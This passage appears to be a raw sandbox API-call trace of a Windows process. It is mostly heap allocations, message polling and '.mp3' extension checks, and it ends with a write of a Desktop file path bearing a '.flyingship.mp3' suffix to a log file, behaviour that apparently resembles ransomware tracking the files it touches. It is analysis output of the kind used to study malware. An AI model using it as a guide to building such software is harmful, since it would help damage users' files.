RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0165.437] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0165.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0165.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0165.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0165.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0165.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0165.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0165.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0165.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0165.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0165.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0165.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0165.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0165.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0165.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0165.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0165.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0165.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0165.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0165.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0165.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0165.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0165.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0165.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0165.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0165.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0165.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0165.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0165.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0165.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0165.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0165.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0165.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0165.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0165.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0165.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0165.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0165.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0165.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0165.438] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0165.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0165.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0165.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0165.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0165.438] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0165.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0165.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0165.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0165.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0165.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0165.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0165.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0165.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0165.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0165.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0165.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0165.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0165.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0165.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0165.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0165.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0165.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0165.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0165.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0165.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0165.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0165.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0165.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0165.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0165.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0165.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0165.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0165.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0165.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0165.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0165.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0165.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0165.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0165.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0165.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0165.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0165.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0165.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0165.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0165.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0165.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0165.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0165.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0165.440] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0165.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0165.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0165.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0165.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0165.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0165.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0165.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0165.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0165.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0165.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0165.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0165.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0165.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0165.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0165.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0165.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0165.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0165.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0165.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0165.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0165.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0165.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0165.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0165.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0165.441] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0165.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0165.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0165.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0165.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0165.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0165.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0165.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0165.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0165.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0165.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0165.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0165.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0165.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0165.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0165.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0165.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0165.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0165.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0165.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0165.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0165.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0165.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0165.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0165.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0165.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0165.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0165.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0165.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0165.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0165.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0165.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0165.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0165.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0165.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x110) returned 0x8feba8 [0165.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0165.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0165.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0165.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0165.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0165.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0165.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0165.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0165.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0165.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0165.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0165.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0165.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0165.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0165.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0165.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0165.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0165.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0165.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9c5180 [0165.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0165.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0165.444] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0165.445] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.445] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0165.445] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.445] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0165.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0165.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9d5188 [0165.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0165.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0165.446] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0165.446] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0xa21, lpOverlapped=0x0) returned 1 [0165.446] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0165.447] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xa21, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.447] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0165.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0165.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0165.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0165.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0165.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.flyingship.mp3\r\n", cchWideChar=72, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0165.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x48) returned 0x9aa4f8 [0165.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.flyingship.mp3\r\n", cchWideChar=72, lpMultiByteStr=0x9aa4f8, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.flyingship.mp3\r\n", lpUsedDefaultChar=0x0) returned 72 [0165.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0165.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0165.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0165.447] WriteFile (in: hFile=0x120, lpBuffer=0x923b28*, nNumberOfBytesToWrite=0x47, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923b28*, lpNumberOfBytesWritten=0x87f43c*=0x47, lpOverlapped=0x0) returned 1 [0165.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0165.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0165.447] CloseHandle (hObject=0x120) returned 1 [0165.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0165.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0165.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0165.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0165.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0165.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0165.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0165.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0165.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0165.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0165.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0165.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0165.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0165.456] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0165.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0165.456] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0165.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0165.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0165.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0165.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0165.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 